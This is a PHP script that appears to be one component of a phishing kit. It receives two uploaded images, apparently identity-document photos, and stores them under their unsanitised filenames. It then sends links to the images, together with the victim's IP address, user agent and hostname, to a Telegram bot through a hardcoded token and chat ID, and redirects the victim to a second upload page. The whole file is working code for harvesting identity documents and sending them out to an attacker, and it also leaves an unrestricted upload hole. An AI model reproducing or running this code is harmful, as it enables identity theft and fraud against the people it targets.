<?php

session_start();

$ip   = $_SERVER['REMOTE_ADDR'];
$UA   = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['REMOTE_HOST'];
	
	$actual_link = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";

	$img_name=$_FILES['file']['name'][0];
	$tmp_img_name=$_FILES['file']['tmp_name'][0];
	$dir='../results/uploads/';
	$dir1= "/" .$dir. "" .$img_name. "" ;
	$dir1= trim(str_replace('../','',$dir1));
	$actual_link = trim(str_replace('/process/config5.php','',$actual_link));
	move_uploaded_file($tmp_img_name,$dir.$img_name);

	$img_name2=$_FILES['file']['name'][1];
    $tmp_img_name2=$_FILES['file']['tmp_name'][1];
    $dir='../results/uploads/';
    $dir5= "/" .$dir. "" .$img_name2. "" ;
    $dir5= trim(str_replace('../','',$dir5));
    move_uploaded_file($tmp_img_name2,$dir.$img_name2);

$data = " << 𝑵 𝑬 𝑾   𝑺 𝑯 𝑨 𝑫 𝑶 𝑾   𝑰 𝑫    >>\r\n";
$data.= " > pic1 : $actual_link$dir1 \r\n";
$data.= " > pic1 : $actual_link$dir5 \r\n";
$data.= " <<       S E S S I O N    I N F O      >>\r\n";
$data.= " > User Agent: $UA \r\n";
$data.= " >IP : $ip \r\n";
$data.= " >HOSTNAME : $host \r\n";
$data.= "<<      𝑬 𝑵 𝑫   𝑶 𝑭  𝑰 𝑫         >>\r\n";
$tokennn = "8078271386:AAFiFlcg-E0vcNQLyhhVotNmTm1RfZgyCSQ";
$chatiddd = "-1003137771790";

file_get_contents("https://api.telegram.org/bot$tokennn/sendMessage?chat_id=$chatiddd&text=" . urlencode($data)."" );

header("Location: ../pic2.php");

?>

